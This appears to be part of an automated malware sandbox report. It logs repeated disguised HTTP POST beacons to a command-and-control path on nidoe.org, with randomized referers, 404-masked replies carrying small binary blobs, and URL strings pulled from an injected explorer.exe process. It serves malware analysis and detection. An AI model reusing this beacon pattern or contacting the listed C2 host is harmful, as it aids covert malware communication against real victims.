    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ibixnemdysifgd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owewxdswvpurak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oykcjyefevftfd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ybjmbdiflbije.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwbpryoiwnr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oycdwmonhjrtmcya.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: nidoe.org
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iscsxhjipsydnvm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: nidoe.org
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: nidoe.org
    Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkexntmwarsh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: nidoe.org
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 8d Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:47:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:48:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2046464539.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: explorer.exe, 00000002.00000000.2042687938.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2046464539.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2046464539.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2046464539.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000002.00000000.2046464539.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: explorer.exe, 00000002.00000000.2045859613.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2045270374.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2045828799.0000000008870000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
    Source: explorer.exe, 00000002.00000000.2050412699.000000000C860000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: explorer.exe, 00000002.00000000.2049916857.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
    Source: explorer.exe, 00000002.00000000.2044572626.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000002.00000000.2044572626.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000002.00000000.2043431169.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
